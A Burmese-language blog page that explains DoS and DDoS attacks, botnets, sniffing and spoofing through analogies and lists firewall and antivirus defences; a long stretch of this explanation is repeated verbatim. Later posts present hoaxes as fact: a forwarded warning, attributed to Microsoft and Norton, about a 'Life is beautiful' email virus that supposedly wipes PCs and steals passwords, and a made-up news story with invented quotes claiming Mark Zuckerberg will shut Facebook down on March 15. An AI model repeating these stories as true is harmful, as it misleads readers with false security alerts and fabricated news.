* မိမိကြန္ပ်ဴတာမွာ မလုိအပ္တဲ႔ Intenet Port Number ေတြကိုပိတ္ပါ.. ကြန္ပ်ဴတာရဲ႕ Port ကုိစစ္ရန္ http://www.auditmypc.com/firewall-test.asp
* Email အား စနစ္တစ္က်အသုံးၿပဳပါ... mail filtering ကုိအသုံးၿပဳပါ...
ဒီအတြက္ အဓိက အေနနဲ႔ကေတာ့ Firewall ကုိထပ္ၿပီးေၿပာပါမယ္.. Firewall မွာ Hardware Firewall နဲ႔ Software Firewall ဆုိၿပီးရွိပါတယ္...
Hardware Firewall
ဒါကုိ Network Firewall လုိ႔လည္းေခၚၿပီး ယေန႔ေခတ္ ေနာက္ဆုံးေပၚ ADSL Router ေတြမွာ တစ္ခါတည္းတြဲၿပီးပါလာတတ္ပါတယ္... Coporate လုပ္ငန္းေတြဆုိရင္ေတာ့ Firewall Router တစ္ခုကုိ သီးသန္႔၀ယ္ၿပီး ဆင္ထားတတ္ၾကပါတယ္... Software Firewall ထက္စာရင္ Hardware Firewall ကပုိၿပီးေကာင္းမြန္ပါတယ္..
ေနာက္တစ္ခုက ဒါကေတာ့ DoS or DDoS ေတြကုိ ကာကြယ္ဖုိ႔ ေကာင္းမြန္တဲ႔ Server ဖြဲ႕စည္းမႈတစ္ခုပါပဲ... အထဲမွာ Hardware Firewall အၿပင္ Load Balancer ဆုိတာကုိပါထည့္ထားပါ တယ္...
Load Balancer ကုိၿပထားတာပါ...
အားလုံးကုိ အက်ဥ္းခ်ဳပ္ၿပီးေၿပာရမယ္ဆုိရင္ DoS ဆုိတာ Attacker ကေန Victim ကုိ တုိက္ရုိက္တုိက္ခုိက္တယ္.. DDoS ဆုိတာကေတာ့ ၾကားခံ Zombie ကုိေမြးၿပီး တုိက္ခုိက္ တယ္... ဒီေလာက္ပါပဲ...
Zombie & Botnet
Zombies ဆုိတာ ဟက္ကာရဲ႕ အသုံးခ်ခံတစ္ခုၿဖစ္ၿပီး Victim ကုိ ဟက္ကာရဲ႕ ခုိင္းေစခ်က္အတုိင္း တုိက္ခုိက္ရတာၿဖစ္ပါတယ္.. ဒါေၾကာင့္ Zombie ရတယ္ဆုိတာ malware ရတာလုိ႔ဆုိႏုိင္ပါတယ္.. Malware (zombie) ရထားတဲ႔ ကြန္ပ်ဴတာဟာ
* Sending spam
* Hack other computers
* Denial of service attacks
* Advertisement click fraud
* Phishing websites
စသည္တုိ႔ကုိလုပ္ေဆာင္ၾကပါတယ္..
၄င္း Malware, trojan, virus ဟာ အသုံးခ်ခံကြန္ပ်ဴတာအတြင္း၀င္ေရာက္ၿပီး အထဲမွာရွိတဲ႔ Security ေတြ၊ Antivirus ေတြကုိ ပိတ္ကာ Hacker အေနနဲ႔ Additional Programေတြ ထည့္သြင္းလုိ႔ရေအာင္၊ ၀င္ထြက္လုိ႔ရေအာင္ လမ္းဖြင့္ေပးပါတယ္... ဒီေတာ့ ၄င္း ကြန္ပ်ဴတာက Hacker ရဲ႕ အသုံးခ်ခံလုံးလုံးၿဖစ္ၿပီး လုိအပ္တဲ႔အခါ အသုံးၿပဳလုိ႔ရေအာင္ Hacker ေတြက ၄င္း Zombie ေလးေတြကုိ စုထားတတ္ပါတယ္... ဒါကုိ botnet လုိ႔ေခၚဆုိႏုိင္ပါတယ္.. bot ဆုိတဲ႔အဓိပၸါယ္ကလည္း Robot လုိ Artificial Intelligence ေပါ႔... အခုလုိ Trojan ေတြမ်ားလာခဲ႔ရင္ ေစလုိရာေစ ခုိင္းလုိ႔ရပါၿပီ... ဟက္ကာေတြက Zombie ေတြသုံးၿပီးတုိက္ခုိက္လုိက္ေတာ့ သူတုိ႔ကုိ လုိက္လံ Trace လုိက္ရတာ ခက္သြားတာ ေပါ႔...
မိမိစက္က Zombie ၿဖစ္ေနၿပီဆုိရင္ေတာ့
၁။ မိမိ RUN လုိက္တဲ႔ programs ေတြက ေႏွးလာမယ္။
၂။ services ေတြ (ဥပမာ http) high rate က်လာမယ္။
၃။ မ်ားၿပားလွေသာ connection requests ေတြဟာ ကြဲၿပားတဲ႔ Networks ေတြကေန ၀င္လာမယ္။
၄။ မိမိရဲ႕ site ကုိလာေရာက္အသုံးၿပဳသူေတြက site ကုိ အသုံးၿပဳတဲ႔ ေနရာမွာ ေႏွးမယ္။
၅။ မိမိရဲ႕ စက္ဟာ CPU load ၿမင့္ေနလိမ့္မယ္။
DoS တုိက္ခုိက္မႈမွာ သတ္မွတ္ထားတဲ႔ Targeted System (Victim) နဲ႔ ၄င္း System ရဲ႕ Port, network component, firewall ကုိ အတိအက်ေရြးခ်ယ္ တုိက္ခုိက္တာၿဖစ္တဲ႔ အၿပင္ printer ေတြ Alarm System ေတြၿပတ္ေတာက္သြားေအာင္ တုိက္ခုိက္တာလည္းရွိပါတယ္....
ဒါေၾကာင့္ DoS အတုိက္ခံရၿပီဆုိရင္
* Network ရဲ႕ စြမ္းရည္က်ဆင္းလာၿခင္း (ေႏွးေကြးလာၿခင္း)
* Website မ်ားကုိ အသုံးၿပဳတဲ႔အခါ အသုံးၿပဳ၍ မရၿခင္း (တုိက္ခုိက္တဲ႔သူက http server ကုိ request အေၿမာက္အမ်ားေတာင္းဆုိၿခင္းေၾကာင့္)
* spam mail ေတြ အ၀င္မ်ားလာၿခင္း ( Mail Server ပ်က္စီးမယ္/တုိက္ခုိက္သူက အခ်ိန္တုိအတြင္းမွာ ေမးလ္ေတြ ေထာင္ေပါင္းမ်ားစြာကုိ victim အားပုိ႔ေဆာင္ေသာေၾကာင့္)
* Computer or Webserver မ်ားရဲ႕ CPU & Memory Usage ေတြ ၿမင့္တက္ေနၿခင္းတုိ႔ကုိေတြ႔ရႏုိင္ပါတယ္။
တုိက္ခုိက္ပုံ
DoS ရဲ႕ တုိက္ခုိက္ပုံကေတာ့ Peer to Peer တုိက္ခိုက္သလုိပါပဲ... အထူးၿပဳလုပ္ထားတဲ႔ DoS Tool ေတြနဲ႔ Vitim ရဲ႕ host သုိ႔မဟုတ္ ip address and port ေတြကုိ အခ်ိန္တုိ အတြင္းမွာ request ေပါင္းမ်ားစြာေတာင္းဆုိ အသုံးၿပဳၿခင္းပဲၿဖစ္ပါတယ္။
တုိက္ခုိက္တဲ႔ မႈကြဲေတြကေတာ့
* ICMP Flood
* Teardrop Attack
* Peer-to-Peer Attack
* Permanent Denial of Service
* Application Level Floods (IRC Floods)
* Nuke
* Distributed Attack
* Reflected Attack
* Degradation-of-Service
* Unintentional Denial of Service
* Denial of Service Level II
* Blind Denial of Service
DDoS ( Distributed Denial of Service) ဆုိတာ DoS ရဲ႕ Advanced Version တစ္ခုလုိ႔ ဆုိႏုိင္ပါတယ္။ ပစ္မွတ္ Server တစ္ခုကုိ flooding packets ေပါင္းမ်ားစြားအာ
single network တစ္ခုကတင္ မဟုတ္ပဲနဲ႔ Multiple host or network ေတြကေနတုိက္ခုိက္တာပါ။ DDoS က ယေန႔ေခတ္အတြက္ ကုရာ နတၳိေဆးမရွိသလုိၿဖစ္ေနၿပီး မိမိသုံး
တဲ႔ Server ရဲ႕ Security အားနည္းတာလည္း ၿဖစ္နိင္သလုိ site ရဲ႕ security ေစာင့္ၾကည့္မူ႔ေတြအားနည္းမူ႔ေၾကာင့္လည္း ၿဖစ္ပါတယ္။
ဘယ္လုိပဲၿဖစ္ေစ DoS နဲ႔ DDoS ကုိကၽြန္ေတာ္တုိ႔ ထပ္ၿပီး အနည္းငယ္ အက်ယ္ခ်ဲ႕ ၾကည့္ရေအာင္.. ကၽြန္ေတာ္က လူတစ္ေယာက္ကုိ စိတ္ပုိင္းဆုိင္ရာ ေႏွာက္ယွက္ခ်င္တယ္ဆုိရင္ အဲ႔လူရဲ႕ ဖုန္းနံပါတ္ကုိေကာက္ႏုိပ္လုိက္မယ္.. ၿပီးရင္ အဲ႔လူနားေထာင္ေလာက္တဲ႔ အခ်ိန္က်မွ ဖုန္းကုိ ေကာက္ခ်လုိက္မယ္.. ဒီလုိအၾကိမ္အေရအတြက္ မ်ားလာခဲ႔မယ္ဆုိရင္ တစ္ဖက္ကလူလည္းအေႏွာက္အယွက္ၿဖစ္မယ္... စိတ္ညစ္မယ္ေပါ႔.. ဒါဟာ Attacker to Victim တုိက္ရုိက္ ဆက္ႏြယ္တဲ႔ DoS နည္းလမ္းပဲ... ဒါေပမဲ႔ Victim က နည္းပညာေကာင္းၿပီး Attacker ရဲ႕ ဖုန္းနံပါတ္ေလးတစ္ခုတည္းကုိပဲ Block လုပ္ထားလုိက္မယ္ဆုိရင္ Attacker က ေခၚလုိ႔ရမွာမဟုတ္ေတာ့ဘူး ... ဒီလုိအခ်ိန္မွာ Attacker က ထပ္ေလာင္း၍ တစ္ၿခားနည္းလမ္းကုိသုံးလာလိမ့္မယ္.. အဲ႔ဒါကေတာ့ Radio Station ေတြကေနၿပီးေတာ့ လာမည့္ဘယ္ေန႔ ဘယ္အခ်ိန္မွာ ဘယ္ပြဲအတြက္ လက္မွတ္ေတြကုိ ေစ်းႏႈန္းခ်ဳိသာစြာေရာင္းခ်ေနတယ္... ေနာက္ထပ္ ဘယ္ေနရာမွာ အႏၱရာယ္နဲ႔ေတြ႔ေနတယ္.. ဒီလုိ Fade ေတြကုိ Victim နဲ႔ သတ္ဆုိင္တဲ႔သူေတြကုိ သတင္းေပးလုိက္မယ္ဆုိရင္ Victim ရဲ႕ မိတ္ေဆြအေပါင္းအသင္းေတြကလည္း Victim ကုိ တစ္ေယာက္ၿပီးတစ္ေယာက္ ဖုန္းဆက္ အေၾကာင္းၾကား အသိေပးေနေတာ့မွာပါပဲ.. ဒါက Distributed လုပ္တယ္လုိ႔ ေခၚတယ္.. တစ္နည္းအားၿဖင့္ DDoS ေပါ႔...
Distributed လုပ္တဲ႔ေနရာမွာ Attacker (Hacker) ေတြက Malware, Virus ေတြနဲ႔ၿဖစ္ေစ Fade Mail, Social Engineering နဲ႔ၿဖစ္ေစ အြန္လုိင္းကုိ ၿဖန္႔လုိက္ပါတယ္... ၄င္း Attacker ရဲ႕ Malware,Virus ေတြ မိမိစက္ထဲကုိေရာက္လာတာပဲၿဖစ္ေစ Social Engineering နဲ႔ေရာက္လာတာပဲ ၿဖစ္ေစ မိမိရဲ႕ စက္ဟာ Attacker ရဲ႕ အသုံးခ်ခံၿဖစ္သြား ပါၿပီ... ဒါကုိ Zombie လုိ႔ေခၚပါတယ္... ဒီ Zombie ေတြဟာ ဟက္ကာေတြရဲ႕ ခုိင္းေစတာကုိ လုပ္ေဆာင္ဖုိ႔ အခ်ိန္တုိင္းအသင့္ရွိေနၾကပါတယ္... ဒီလုိအြန္လုိင္းမွာ ဟက္ကာေတြ ရဲ႕ အသုံးခ်ခံေနရတဲ႔ Zombie ေတြက မနည္းပါဘူး။ ဒီအခ်ိန္မွာ တုိက္ခုိက္မဲ႔ Attacker (Hacker) က ၄င္းရဲ႕ Zombie ေတြကုိ အခ်ိန္၊ ေနရာ ေတြကုိ ညြန္ၾကားေပးလုိက္တာနဲ႔ Victim ကုိ အားလုံး Fade Request, Fade Mail ေတြ ပုိ႔ေဆာင္ၾကတာပါပဲ...
Fade Mail ဆုိတာက Mail Bomber ပုံစံမ်ဳိး တစ္ၾကိမ္မွာ ေမးလ္ေပါင္း ေသာင္းနဲ႔ ခ်ီၿပီး ပုိ႔ေဆာင္ႏုိင္သလုိ ၄င္းကုိ Distributed လုပ္ၿပီးတုိက္ခုိက္တာလည္းရွိပါတယ္... သာမာန္ user တစ္ေယာက္က ထုိသူသြားလည္တဲ႔ Website (www.abc.com) တစ္ခု ရွိတယ္ဆုိၾကပါစုိ႔ .. Attacker က ၄င္းရဲ႕ Website မွာ စိတ္၀င္စားစရာ ေၾကာ္ၿငာေလး တစ္ခုထည့္ထားမယ္ ... ဒီအခ်ိန္မွာ ၄င္း site (www.abc.com) ကုိလာေရာက္လည္ပတ္တဲ႔သူေတြက ၄င္း ေၾကာ္ၿငာ္ေလးကုိ ႏုိပ္လုိက္တုိင္းမွာ Attacker ၾကိဳတင္သတ္မွတ္ ထားတဲ႔ Victim ရဲ႕ mail server ကုိ ေမးလ္ေပါင္း ေၿမာက္မ်ားစြာ ပုိ႔ၾကပါလိမ့္မယ္... ဒီလုိအခ်ိန္မွာ တစ္ဖက္က SMTP/POP စသည့္ Mail Server ေတြက Down သြားႏုိင္ပါ တယ္။
ဒါဟာ ရုိးရွင္းတဲ႔ တုိက္ခုိက္မႈပဲရွိပါေသးတယ္...DoS and DDoS တုိက္ခုိက္မႈမွာ 'packet-forgery' ေခၚတဲ႔ packet အတုအေယာင္ ဖန္တီးၿခင္း၊ 'IP spoofing' ေခၚတဲ႔ IP Address ကုိ packet နဲ႔အတူေၿပာင္းလဲၿခင္း စသည္အမ်ားၾကီးရွိပါေသးတယ္..
ဒီေနရာမွာ Ethernet ဆုိတာကုိ နဲနဲေလး လူဗိန္းနားလည္ေလာက္တဲ႔ ပုံစံနဲ႔ ေၿပာပါမယ္.. Ethernet ရဲ႕ System ေတြဆက္သြယ္မႈမွာ "packets" frames ေလးေတြ ကရွိပါတယ္ အဲ႔ frame ထဲ destination address, source address type field and data ေလးေတြပါ၀င္ပါတယ္... Ethernet address က 6 bytes ရွိၿပီး ၄င္းတုိ႔ရဲ႕ ကုိယ္ပုိင္ Ethernet Address တစ္ခုစီ ရွိၾကပါတယ္။ Ethernet က အသုံးၿပဳတာက CSMA/CD (Carrier Sense and Multiple Access with Collision Detection) ကုိအသုံးၿပဳတာၿဖစ္တဲ႔အတြက္ ၄င္းတုိ႔က Data တစ္ခုပုိ႔ေတာ့မယ္ဆုိရင္ ၄င္းပုိ႔မယ့္ Destination လမ္းေၾကာင္းေပၚမွာ သူပုိ႔ေဆာင္တဲ႔ Data ေတြ ရွိမရွိစစ္ပါတယ္... ရွိေသးရင္ ေခတၱခဏ ေစာင့္ၿပီးမွ ထပ္ပုိ႔ပါ တယ္... ဒီလုိလုပ္တာကုိ Collision Detection လုပ္တယ္လုိ႔ေခၚပါတယ္.. ဒီေတာ့ တစ္ခါပုိ႔ႏုိင္ၿပီး လက္ခံတာကေတာ့ အဆက္မၿပတ္လက္ခံႏုိင္တယ္ဆုိတဲ႔ သေဘာေပါ႔....
ဒါကုိ ဥပမာတစ္ခုထပ္ေပးမယ္... Ethernet technology ဆုိတာ အေမွာင္ခန္းထဲမွာ လူေတြ၀ုိင္းဖြဲ႕ စကားေၿပာတာနဲ႔တူပါတယ္... အခန္းထဲမွာဘယ္သူေၿပာေၿပာ အားလုံးက ၾကားပါတယ္.. ဒါက Carrier Sense ၿဖစ္ပါတယ္။ အခန္းထဲက လူတုိင္းက သူတုိ႔ စိတ္ဆႏၵရွိရင္ ေၿပာဆုိႏုိင္ပါတယ္.. ဒါက Multiple Access ၿဖစ္ပါတယ္.. ဒါေပမဲ႔ေၿပာတဲ႔သူ ေတြတုိင္းက ယဥ္ေက်းသိမ္ေမြ႔တဲ႔အတြက္ စကားေၿပာတဲ႔ ေနရာမွာ ဆင္ၿခင္ၾကတယ္ေပါ႔... အကယ္၍ တစ္ေယာက္က စကားေၿပာတဲ႔အခါမွာ ေနာက္တစ္ေယာက္က ပထမတစ္ ေယာက္ရဲ႕ စကားအၿပီးကုိေစာင့္ၾကၿပီး ဘာမွမေၿပာပါဘူး... ဒါက Collision Detection ၿဖစ္ပါတယ္။ အခန္းထဲမွာ ရွိတဲ႔ လူေတြမွာ နာမည္ကုိယ္စီရွိၾကပါတယ္.. ဒါက unique Ethernet address ၿဖစ္ပါတယ္... ဒီအခ်ိန္မွာ အခန္းထဲက လူတစ္ေယာက္က " Hello, brb, I'm PlanetCreator " လုိ႔ေၿပာရင္ ဒါက Ethernet destination and source
address ၿဖစ္ပါတယ္... ေၿပာမဲ႔သူက အားလုံးကုိ ေၿပာခ်င္တယ္ဆုိရင္ "Hello everyone, I'm PlanetCreator" လုိ႔ေၿပာပါလိမ့္မယ္.. ဒါက Broadcast Message လုိ႔ေခၚပါတယ္ အၿဖစ္အမ်ားဆုံးကေတာ့ ဒီအခန္းထဲမွာ ရွိတဲ႔သူေတြအားလုံးက တစ္ေယာက္ကုိ တစ္ေယာက္ ယုံၾကည္တဲ႔အတြက္ စကားကုိ လ်ဳိ႕၀ွက္ခ်က္မပါပဲ ပြင့္ပြင့္လင္းလင္းေၿပာၾကပါ တယ္... ဒါက non-encrypted data communication is common ၿဖစ္ပါတယ္..
ဒီအခ်ိန္မွာ အခန္းထဲကုိ လူစိမ္းတစ္ေယာက္က ၀င္လာတယ္ဆုိပါစုိ႔ ဒါကုိ (has tapped that Ethernet segment) လုိ႔သတ္မွတ္မယ္... အထဲမွာေၿပာတဲ႔သူေတြအားလုံးက လ်ဳိ႕၀ွက္ခ်က္မရွိပဲေၿပာသလုိ ၀င္ေရာက္လာတဲ႔ လူစိမ္းကလည္း စကား၀ိုင္းကုိ မေႏွာက္ယွက္ပဲ ထုိင္ၿပီးနားေထာင္ေနမယ္ .. ဒါကုိ Sniffing လုပ္တယ္လုိ႔ေခၚမယ္... ၿပီးရင္ အခန္းထဲက ၿပန္ထြက္သြားမယ္... ဘာမွေႏွာက္ယွက္မႈမလုပ္ခဲ႔တဲ႔အတြက္ သူ႔ကုိ Detect လုပ္ဖုိ႔ခက္ပါတယ္.. ဒီေလာက္ပါပဲ...
ဒီအခ်ိန္မွာ ၀င္ေရာက္လာတဲ႔ လူစိမ္းက အဆက္မၿပတ္ေၿပာေနမယ္ဆုိရင္ ဒါက DoS to that segment of the Ethernet ၿဖစ္တယ္လုိ႔ေခၚၿပီး သူတစ္ေယာက္တည္းတင္သာမ က အၿခားသူမ်ားကုိပါ စကားေတြ တစ္ၿပိဳင္နက္ထဲေၿပာေအာင္ လုပ္တယ္ဆုိရင္ DDoS ေပါ႔... ၿပီးရင္ အခန္းတစ္ခုလုံး လက္ပံပင္ဇရပ္ၿဖစ္သြားေတာ့ စကား၀ုိင္းေခၚတဲ႔ server ပ်က္ၿပီေပါ႔...
လူစိမ္းက ခဏကလုိ စကားေတြေၿပာတဲ႔အခါ အၿခားသူတစ္ေယာက္လုိ အသံမ်ဳိးနဲ႔ ထၿပီး စကားေၿပာမယ္.. ေနာက္တစ္ခါ ေနာက္တစ္ေယာက္ ေလသံနဲ႔ အသံတုလုပ္ေၿပာမယ္ ဆုိရင္ ဒါက IP Spoofing လုပ္တယ္ေခၚတယ္... ၿပီးရင္ ေနာက္တစ္ေယာက္ကုိ နာမည္အတုနဲ႔ စကားေတြေၿပာေနမယ္ဆုိရင္ packet forgery လုိ႔ေခၚတယ္...
သာမာန္အတြက္ Attacker (Hacker) က How are you ? ဆုိတဲ႔ ေမးလ္ခြန္းကုိ Server (Victim) က I'm fine ဆုိၿပီးတစ္ခါေၿဖႏုိင္ပါတယ္။ ဒါေပမဲ႔ Attacker ဖန္တီးထားတဲ႔ Zombie ေတြက တစ္ခ်ိန္တည္း တစ္ၿပိဳင္တည္း How are you? How are you? How are you? ဆုိၿပီး အုံလုိက္ေမးတဲ႔အခါ server က တစ္ေယာက္ကုိေၿဖၾကားေပးၿပီး ေနာက္တစ္ေယာက္ကုိ ေၿဖၾကားေပးဖုိ႔ လုပ္ေဆာင္ရပါတယ္... ဒီလုိေၿဖၾကားေနရတာမ်ားေတာ့ CPU ေတြ RAM ေတြက မခံႏုိင္ေတာ့ပါဘူး။ ဒါေၾကာင့္ ဆက္သြယ္မႈေတြ ၿပတ္ေတာက္သြားတာပါ။ Server Overload ၿဖစ္ၿပီး Data ေတြ ဆုံးရႈံးတဲ႔အထိ ၿဖစ္တတ္ပါတယ္။
DoS or DDoS attack ကုိဘယ္ကုိကာကြယ္မလဲ ဆုိတာကေတာ့ ရာႏႈန္းၿပည့္ကာကြယ္ႏုိင္တဲ႔ နည္းလမ္းကုိ မေတြ႔ေသးပါဘူး။ ဒါေပမဲ႔ ေကာင္းမြန္တဲ႔နည္းလမ္းတစ္ခ်ဳိ႕ေတာ့ရွိပါ တယ္...
* အၿမဲတမ္းမိမိရဲ႕ anti virus program ကုိ update လုပ္ေပးပါ
* Firewall အားမွန္ကန္၍ တင္းၾကပ္ေသာ rule မ်ားသတ္မွတ္ပါ...
* မိမိကြန္ပ်ဴတာမွာ မလုိအပ္တဲ႔ Intenet Port Number ေတြကိုပိတ္ပါ.. ကြန္ပ်ဴတာရဲ႕ Port ကုိစစ္ရန္ http://www.auditmypc.com/firewall-test.asp
* Email အား စနစ္တစ္က်အသုံးၿပဳပါ... mail filtering ကုိအသုံးၿပဳပါ...
ဒီအတြက္ အဓိက အေနနဲ႔ကေတာ့ Firewall ကုိထပ္ၿပီးေၿပာပါမယ္.. Firewall မွာ Hardware Firewall နဲ႔ Software Firewall ဆုိၿပီးရွိပါတယ္...
Hardware Firewall
ဒါကုိ Network Firewall လုိ႔လည္းေခၚၿပီး ယေန႔ေခတ္ ေနာက္ဆုံးေပၚ ADSL Router ေတြမွာ တစ္ခါတည္းတြဲၿပီးပါလာတတ္ပါတယ္... Coporate လုပ္ငန္းေတြဆုိရင္ေတာ့ Firewall Router တစ္ခုကုိ သီးသန္႔၀ယ္ၿပီး ဆင္ထားတတ္ၾကပါတယ္... Software Firewall ထက္စာရင္ Hardware Firewall ကပုိၿပီးေကာင္းမြန္ပါတယ္..
ေနာက္တစ္ခုက ဒါကေတာ့ DoS or DDoS ေတြကုိ ကာကြယ္ဖုိ႔ ေကာင္းမြန္တဲ႔ Server ဖြဲ႕စည္းမႈတစ္ခုပါပဲ... အထဲမွာ Hardware Firewall အၿပင္ Load Balancer ဆုိတာကုိပါထည့္ထားပါ တယ္...
Load Balancer ကုိၿပထားတာပါ...
အားလုံးကုိ အက်ဥ္းခ်ဳပ္ၿပီးေၿပာရမယ္ဆုိရင္ DoS ဆုိတာ Attacker ကေန Victim ကုိ တုိက္ရုိက္တုိက္ခုိက္တယ္.. DDoS ဆုိတာကေတာ့ ၾကားခံ Zombie ကုိေမြးၿပီး တုိက္ခုိက္ တယ္... ဒီေလာက္ပါပဲ...
Zombie & Botnet
Zombies ဆုိတာ ဟက္ကာရဲ႕ အသုံးခ်ခံတစ္ခုၿဖစ္ၿပီး Victim ကုိ ဟက္ကာရဲ႕ ခုိင္းေစခ်က္အတုိင္း တုိက္ခုိက္ရတာၿဖစ္ပါတယ္.. ဒါေၾကာင့္ Zombie ရတယ္ဆုိတာ malware ရတာလုိ႔ဆုိႏုိင္ပါတယ္.. Malware (zombie) ရထားတဲ႔ ကြန္ပ်ဴတာဟာ
* Sending spam
* Hack other computers
* Denial of service attacks
* Advertisement click fraud
* Phishing websites
စသည္တုိ႔ကုိလုပ္ေဆာင္ၾကပါတယ္..
၄င္း Malware, trojan, virus ဟာ အသုံးခ်ခံကြန္ပ်ဴတာအတြင္း၀င္ေရာက္ၿပီး အထဲမွာရွိတဲ႔ Security ေတြ၊ Antivirus ေတြကုိ ပိတ္ကာ Hacker အေနနဲ႔ Additional Programေတြ ထည့္သြင္းလုိ႔ရေအာင္၊ ၀င္ထြက္လုိ႔ရေအာင္ လမ္းဖြင့္ေပးပါတယ္... ဒီေတာ့ ၄င္း ကြန္ပ်ဴတာက Hacker ရဲ႕ အသုံးခ်ခံလုံးလုံးၿဖစ္ၿပီး လုိအပ္တဲ႔အခါ အသုံးၿပဳလုိ႔ရေအာင္ Hacker ေတြက ၄င္း Zombie ေလးေတြကုိ စုထားတတ္ပါတယ္... ဒါကုိ botnet လုိ႔ေခၚဆုိႏုိင္ပါတယ္.. bot ဆုိတဲ႔အဓိပၸါယ္ကလည္း Robot လုိ Artificial Intelligence ေပါ႔... အခုလုိ Trojan ေတြမ်ားလာခဲ႔ရင္ ေစလုိရာေစ ခုိင္းလုိ႔ရပါၿပီ... ဟက္ကာေတြက Zombie ေတြသုံးၿပီးတုိက္ခုိက္လုိက္ေတာ့ သူတုိ႔ကုိ လုိက္လံ Trace လုိက္ရတာ ခက္သြားတာ ေပါ႔...
မိမိစက္က Zombie ၿဖစ္ေနၿပီဆုိရင္ေတာ့
၁။ မိမိ RUN လုိက္တဲ႔ programs ေတြက ေႏွးလာမယ္။
၂။ services ေတြ (ဥပမာ http) high rate က်လာမယ္။
၃။ မ်ားၿပားလွေသာ connection requests ေတြဟာ ကြဲၿပားတဲ႔ Networks ေတြကေန ၀င္လာမယ္။
၄။ မိမိရဲ႕ site ကုိလာေရာက္အသုံးၿပဳသူေတြက site ကုိ အသုံးၿပဳတဲ႔ ေနရာမွာ ေႏွးမယ္။
၅။ မိမိရဲ႕ စက္ဟာ CPU load ၿမင့္ေနလိမ့္မယ္။
ဒီပို႕ ေလးက ေရႊကိုရံေတာ္ ကေနတင္ေပးလိုက္တာၿဖစ္ပါတယ္။အစ္ကို ေရႊကိုရံေတာ္လည္း ေက်ၚဇူးတင္ပါတယ္။
Wednesday, February 15, 2012
Power Point Presentation, Life is beautiful
ဒီသတင္းဟာယေန႔မနက္တြင္ Microsoftႏွင့္Nortonတုိ႔မွေပးပို႔လုိက္ေသာသတင္းျဖစ္ပါသည္။ ေက်းဇူးျပဳျပီး ဒီသတင္းကိုလက္ဆင့္ကမ္းေပးၾကပါ သင္တုိ႔ဆီသို႔Power Point Presentation, Life is beautiful ဆုိျပီးေမးလ္တစ္ခု၀င္လာပါခဲ့လွ်င္ မဖြင့္ပါႏွင့္ ခ်က္ခ်င္းdeleteလုပ္ပစ္ပါ။ သင္ထုိေမးကိုဖြင့္ခဲ့မိလွ်င္ သင္၏computer secreen တြင္ It is too late now, your life is no longer beautiful ဆုိသည့္စာေပၚလာပါလိမ့္မယ္။ ထုိအခါသင္၏PCမွအရာအားလံုးေပ်ာက္ ဆံုးသြားျပီး ဒီေမးလ္ကိုပို႔သူထံ သင္၏ အမည္၊ e-mail ႏွင့္ password အားလံုးေရာက္ရွိသြားပါလိမ့္မယ္။ သည္အရာသည္ အဂၤါေန႔ ေန႔လည္က စတင္ခဲ့ေသာ virus အသစ္ျဖစ္ပါသည္။ Virus ဖန္တီးသူကေတာ့ life owner ဟု မိမိကုိယ္ကုိအမည္ေပးထားသူတစ္ဦးျဖစ္ပါသည္။ဒီဘေလာ႕ကိုေတာ႕
http://sciencemix.blogspot.com/2010/03/computer-virus-life-is-beautiful.html ကေနေဖာ္ၿပလိုက္တာၿဖစ္ပါတယ္။
http://sciencemix.blogspot.com/2010/03/computer-virus-life-is-beautiful.html ကေနေဖာ္ၿပလိုက္တာၿဖစ္ပါတယ္။
မတ္လ ၁၅ ရက္မွာ Facebook အားတရား၀င္ ဖ်က္သိမ္းမည္
Facebook ကိုလာမည့္ မတ္လတြင္ အဆံုးသတ္မည္ ျဖစ္ေၾကာင္း Mark Zuckerberg က ေၾကျငာလိုက္သည္။ အဆိုပါ site ကို စီမံခန္ ့ခဲြရျခင္းသည္ အလြန္စိတ္ဖိစီးလာ၍ျဖစ္သည္။ " Facebook ကို ထိန္းခ်ဳပ္ လို ့မရ...ေတာ့ဘူး " ဟု Mark Zuckerberg က ကယ္လီဖိုးနီးယား ျပည္နယ္၊ ပယ္လိုအယ္တို ၌ က်င္းပ ျပဳလုပ္ေသာ သတင္းစာရွင္းလင္းပြဲ တစ္ခုတြင္ေျပာၾကားခဲ့သည္။
" ဒီကုမၸဏီ ကို စီမန္ခန္ ့ခြဲရတဲ့စိတ္ဖိစီးမွဳ႕ေၾကာင့္ ကြ်န္ေတာ့္ ဘ၀လည္း ပ်က္ျပီ၊ ဒီရူးသြပ္မွဳ အားလံုးကို ကြ်န္ေတာ္ အဆံုးသတ္ဖို ့လိုပါတယ္ " ဟု ၄င္း က ဆက္လက္ေျပာ ၾကားခဲ့သည္။
" မတ္လ ၁၅ ရက္က်ရင္ Website တစ္ခုလံုး ပိတ္ပါျပီ " ဟု Facebook မွ နည္းပညာေရးရာ ဒုတိယ ဥကၠဌ Avrat Humarthiက ေျပာၾကားသည္။ " ဒီေတာ့ ခင္ဗ်ားတို ့ကိုယ့္ပံုကိုယ္္ျပန္ျမင္ခ်င္ေသးရင္ ဒီပံုေတြကို အင္တာနက္ ကေန ဖယ္လိုက္ေတာ့၊ Facebook လုပ္ငန္း ရပ္ဆိုင္းသြားရင္ အဲဒီပံုေတြ ျပန္မရႏိုင္ေတာ့ဘူး" ဟု Avrat Humarthi က ဆက္လက္ေျပာၾကားခဲ့သည္။
ဤ ဆံုးျဖတ္ခ်က္ကို ခက္ခက္ခဲခဲခ်ခဲ့ရေၾကာင္း၊ သို ့ေသာ္ ျပည္သူမ်ား မေက်မလည္ ကသိအေအာင့္ ျဖစ္လိမ့္မည္ဟု မထင္ပါေၾကာင္း Mark Zuckerberg က ေျပာၾကားခဲ့သည္။
ရိုးရိုးေျပာရရင္ ပိုေကာင္းဖို ့ျဖစ္လာတာလို ့ထင္ပါတယ္။ Facebook မရွိေတာ့ရင္ လူေတြ အျပင္ထြက္ၾကမယ္။ တကယ့္လူသားမိတ္ေဆြသူငယ္ခ်င္းေတြရလာမယ္၊ ဒါဟာ ဘယ္ေတာ့မဆိုေကာင္းတာပဲေလ " ဟု Mark Zuckerberg က တယ္လီဖုန္းႏွင့္ေမးျမန္းမွဳတြင္ ေျပာၾကားခဲ့သည္။
ဒီထတ္လန္ ့တုန္လွဳပ္ဖြယ္ သတင္းကိုၾကားေတာ့ Facebook သံုးစြဲသူ တစ္ခ်ိဳ ့ဟာ ေဒါသတၾကီး ေပါက္ကြဲၾကတယ္၊ Facebook မွ မရွိရင္ ကြ်န္ေတာ္ဘာလုပ္ရမလဲ လို ့ အင္ဒီယာနာ မွ အထက္တန္း ေက်ာင္းသား တစ္ဦးျဖစ္သူ ဒင္းနစ္ဘရက္ေရွာ က ေျပာသည္။
